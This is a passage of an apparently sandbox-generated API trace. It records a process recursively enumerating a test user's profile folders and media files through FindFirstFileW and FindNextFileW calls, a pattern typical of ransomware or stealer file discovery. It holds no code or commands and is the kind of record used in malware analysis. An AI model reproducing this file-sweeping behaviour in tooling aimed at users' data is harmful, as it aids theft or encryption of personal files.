ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0068.331] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.332] lstrlenW (lpString="Windows Live") returned 12 [0068.332] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x5a4060 [0068.361] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0068.378] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.378] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0068.378] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.378] lstrlenW (lpString="Get Windows Live.url") returned 20 [0068.378] FindClose (in: hFindFile=0x5a4060 | out: hFindFile=0x5a4060) returned 1 [0068.379] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0068.379] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0068.379] FindClose (in: hFindFile=0x5c0288 | out: hFindFile=0x5c0288) returned 1 [0068.379] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0068.379] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Links", cAlternateFileName="")) returned 1 [0068.379] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.379] lstrlenW (lpString="Links") returned 5 [0068.379] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName=".", cAlternateFileName="")) returned 0x5c0288 [0068.379] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="..", cAlternateFileName="")) returned 1 [0068.379] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.379] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.379] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.379] lstrlenW (lpString="desktop.ini") returned 11 [0068.379] FindClose (in: hFindFile=0x5c0288 | out: hFindFile=0x5c0288) returned 1 [0068.379] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0068.380] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0068.380] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.380] lstrlenW (lpString="Local Settings") returned 14 [0068.380] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x5bf6a8, ftCreationTime.dwLowDateTime=0x5c84a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0xffffffff [0068.380] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0068.380] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8fe8900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8fe8900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="Music", cAlternateFileName="")) returned 1 [0068.380] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.380] lstrlenW (lpString="Music") returned 5 [0068.380] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8fe8900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8fe8900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName=".", cAlternateFileName="")) returned 0x5c0288 [0068.380] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd8fe8900, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd8fe8900, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="..", cAlternateFileName="")) returned 1 [0068.380] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.380] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x303eba10, ftCreationTime.dwHighDateTime=0x1d5dbd2, ftLastAccessTime.dwLowDateTime=0x12cfd3d0, ftLastAccessTime.dwHighDateTime=0x1d5da95, ftLastWriteTime.dwLowDateTime=0x12cfd3d0, ftLastWriteTime.dwHighDateTime=0x1d5da95, nFileSizeHigh=0x0, nFileSizeLow=0xf441, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="0Ur9IACO8w6y.wav", cAlternateFileName="0UR9IA~1.WAV")) returned 1 [0068.380] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.380] lstrlenW (lpString="0Ur9IACO8w6y.wav") returned 16 [0068.381] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\*", lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92cdfb0, ftCreationTime.dwHighDateTime=0x1d5e2c6, ftLastAccessTime.dwLowDateTime=0xed903fb0, ftLastAccessTime.dwHighDateTime=0x1d5dfc6, ftLastWriteTime.dwLowDateTime=0xed903fb0, ftLastWriteTime.dwHighDateTime=0x1d5dfc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x5a4060 [0068.381] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92cdfb0, ftCreationTime.dwHighDateTime=0x1d5e2c6, ftLastAccessTime.dwLowDateTime=0xed903fb0, ftLastAccessTime.dwHighDateTime=0x1d5dfc6, ftLastWriteTime.dwLowDateTime=0xed903fb0, ftLastWriteTime.dwHighDateTime=0x1d5dfc6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0068.381] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.381] FindNextFileW (in: hFindFile=0x5a4060, lpFindFileData=0x5bf6a8 | out: lpFindFileData=0x5bf6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe8846d0, ftCreationTime.dwHighDateTime=0x1d5df96, ftLastAccessTime.dwLowDateTime=0x867d70d0, ftLastAccessTime.dwHighDateTime=0x1d5e41d, ftLastWriteTime.dwLowDateTime=0x867d70d0, ftLastWriteTime.dwHighDateTime=0x1d5e41d, nFileSizeHigh=0x0, nFileSizeLow=0x11ac4, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="2TyK.m4a", cAlternateFileName="")) returned 1 [0068.381] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.381] lstrlenW (lpString="2TyK.m4a") returned 8 [0068.381] FindClose (in: hFindFile=0x5a4060 | out: hFindFile=0x5a4060) returned 1 [0068.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf6a8 | out: hHeap=0x580000) returned 1 [0068.382] FindNextFileW (in: hFindFile=0x5c0288, lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeee2eb40, ftCreationTime.dwHighDateTime=0x1d5de01, ftLastAccessTime.dwLowDateTime=0x7bcdb430, ftLastAccessTime.dwHighDateTime=0x1d5dd6d, ftLastWriteTime.dwLowDateTime=0x7bcdb430, ftLastWriteTime.dwHighDateTime=0x1d5dd6d, nFileSizeHigh=0x0, nFileSizeLow=0x15784, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="sBmvm.m4a", cAlternateFileName="")) returned 1 [0068.382] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.382] lstrlenW (lpString="sBmvm.m4a") returned 9 [0068.382] FindClose (in: hFindFile=0x5c0288 | out: hFindFile=0x5c0288) returned 1 [0068.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0068.382] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0068.382] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.382] lstrlenW (lpString="My Documents") returned 12 [0068.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x5b81f0, ftCreationTime.dwLowDateTime=0x5cc438, ftCreationTime.dwHighDateTime=0x1d5dde4, ftLastAccessTime.dwLowDateTime=0x4f7ca210, ftLastAccessTime.dwHighDateTime=0x1d5dfcf, ftLastWriteTime.dwLowDateTime=0x4f7ca210, ftLastWriteTime.dwHighDateTime=0x1d5dfcf, nFileSizeHigh=0x0, nFileSizeLow=0xcc09, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="_chBMS5X1.mp3", cAlternateFileName="_CHBMS~1.MP3")) returned 0xffffffff [0068.382] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0068.382] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="NetHood", cAlternateFileName="")) returned 1 [0068.382] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.382] lstrlenW (lpString="NetHood") returned 7 [0068.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x5beb38 | out: lpFindFileData=0x5beb38*(dwFileAttributes=0x5b81f0, ftCreationTime.dwLowDateTime=0x5cc438, ftCreationTime.dwHighDateTime=0x1d5dde4, ftLastAccessTime.dwLowDateTime=0x4f7ca210, ftLastAccessTime.dwHighDateTime=0x1d5dfcf, ftLastWriteTime.dwLowDateTime=0x4f7ca210, ftLastWriteTime.dwHighDateTime=0x1d5dfcf, nFileSizeHigh=0x0, nFileSizeLow=0xcc09, dwReserved0=0xa0000003, dwReserved1=0x74004a, cFileName="_chBMS5X1.mp3", cAlternateFileName="_CHBMS~1.MP3")) returned 0xffffffff [0068.383] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5beb38 | out: hHeap=0x580000) returned 1 [0068.383] FindNextFileW (in: hFindFile=0x5a4020, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x79374468, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0068.383] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.383] lstrlenW (lpString="NTUSER.DAT") returned 10 [0068.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x5b84a0 | out: lpFindFileData=0x5b84a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd90f32a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd90f32a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5c8c48 [0068.383] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5b84a0 | out: lpFindFileData=0x5b84a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd90f32a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd90f32a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.383] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.383] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5b84a0 | out: lpFindFileData=0x5b84a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3077a4f0, ftCreationTime.dwHighDateTime=0x1d5e123, ftLastAccessTime.dwLowDateTime=0x83fa57d0, ftLastAccessTime.dwHighDateTime=0x1d5dbab, ftLastWriteTime.dwLowDateTime=0x83fa57d0, ftLastWriteTime.dwHighDateTime=0x1d5dbab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bz-AX5aGV", cAlternateFileName="BZ-AX5~1")) returned 1 [0068.383] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.383] lstrlenW (lpString="Bz-AX5aGV") returned 9 [0068.383] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Bz-AX5aGV\\*", lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3077a4f0, ftCreationTime.dwHighDateTime=0x1d5e123, ftLastAccessTime.dwLowDateTime=0x83fa57d0, ftLastAccessTime.dwHighDateTime=0x1d5dbab, ftLastWriteTime.dwLowDateTime=0x83fa57d0, ftLastWriteTime.dwHighDateTime=0x1d5dbab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.383] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3077a4f0, ftCreationTime.dwHighDateTime=0x1d5e123, ftLastAccessTime.dwLowDateTime=0x83fa57d0, ftLastAccessTime.dwHighDateTime=0x1d5dbab, ftLastWriteTime.dwLowDateTime=0x83fa57d0, ftLastWriteTime.dwHighDateTime=0x1d5dbab, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="..", cAlternateFileName="")) returned 1 [0068.384] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.384] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x530c5ea0, ftCreationTime.dwHighDateTime=0x1d5de05, ftLastAccessTime.dwLowDateTime=0x550cb620, ftLastAccessTime.dwHighDateTime=0x1d5e321, ftLastWriteTime.dwLowDateTime=0x550cb620, ftLastWriteTime.dwHighDateTime=0x1d5e321, nFileSizeHigh=0x0, nFileSizeLow=0xaa1a, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="62LfZGldE.bmp", cAlternateFileName="62LFZG~1.BMP")) returned 1 [0068.384] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.384] lstrlenW (lpString="62LfZGldE.bmp") returned 13 [0068.384] FindClose (in: hFindFile=0x5c8c88 | out: hFindFile=0x5c8c88) returned 1 [0068.384] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b86f8 | out: hHeap=0x580000) returned 1 [0068.384] FindNextFileW (in: hFindFile=0x5c8c48, lpFindFileData=0x5b84a0 | out: lpFindFileData=0x5b84a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0068.384] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.384] lstrlenW (lpString="desktop.ini") returned 11 [0068.384] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\*", lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9f06d90, ftCreationTime.dwHighDateTime=0x1d5e240, ftLastAccessTime.dwLowDateTime=0xe602f650, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0xe602f650, ftLastWriteTime.dwHighDateTime=0x1d5de88, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName=".", cAlternateFileName="")) returned 0x5c8c88 [0068.385] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe9f06d90, ftCreationTime.dwHighDateTime=0x1d5e240, ftLastAccessTime.dwLowDateTime=0xe602f650, ftLastAccessTime.dwHighDateTime=0x1d5de88, ftLastWriteTime.dwLowDateTime=0xe602f650, ftLastWriteTime.dwHighDateTime=0x1d5de88, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="..", cAlternateFileName="")) returned 1 [0068.385] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.385] FindNextFileW (in: hFindFile=0x5c8c88, lpFindFileData=0x5b86f8 | out: lpFindFileData=0x5b86f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2336e0, ftCreationTime.dwHighDateTime=0x1d5e096, ftLastAccessTime.dwLowDateTime=0x63f98cc0, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0x63f98cc0, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xab1f, dwReserved0=0x1d5e706, dwReserved1=0x2738, cFileName="-BceFOt4.bmp", cAlternateFileName="")) returned 1 [0068.385] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.385] lstrlenW (lpString="-BceFOt4.bmp") returned 12 [0068.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\L15FgMOaXhJ4\\h1fuIpG2L9XEaAuJXba\\*", lpFindFileData=0x5b8a40 | out: lpFindFileData=0x5b8a40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d8230c0, ftCreationTime.dwHighDateTime=0x1d5df15, ftLastAccessTime.dwLowDateTime=0xc0dad320, ftLastAccessTime.dwHighDateTime=0x1d5e2fc, ftLastWriteTime.dwLowDateTime=0xc0dad320, ftLastWriteTime.dwHighDateTime=0x1d5e2fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x510073, cFileName=".", cAlternateFileName="")) returned 0x5c8cc8 [0068.385] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5b8a40 | out: lpFindFileData=0x5b8a40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9d8230c0, ftCreationTime.dwHighDateTime=0x1d5df15, ftLastAccessTime.dwLowDateTime=0xc0dad320, ftLastAccessTime.dwHighDateTime=0x1d5e2fc, ftLastWriteTime.dwLowDateTime=0xc0dad320, ftLastWriteTime.dwHighDateTime=0x1d5e2fc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x370032, dwReserved1=0x510073, cFileName="..", cAlternateFileName="")) returned 1 [0068.385] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.385] FindNextFileW (in: hFindFile=0x5c8cc8, lpFindFileData=0x5b8a40 | out: lpFindFileData=0x5b8a40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf7105f0, ftCreationTime.dwHighDateTime=0x1d5dbfc, ftLastAccessTime.dwLowDateTime=0x61bbf4f0, ftLastAccessTime.dwHighDateTime=0x1d5de9c, ftLastWriteTime.dwLowDateTime=0x61bbf4f0, ftLastWriteTime.dwHighDateTime=0x1d5de9c, nFileSizeHigh=0x0, nFileSizeLow=0xcdfd, dwReserved0=0x370032, dwReserved1=0x510073, cFileName="419BxLjKLP6qw8.gif", cAlternateFileName="419BXL~1.GIF")) returned 1 [0068.385] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0068.385] lstrlenW (lpString="419BxLjKLP6qw8.gif") returned 18 [0068.385] FindFirstFileW (in: 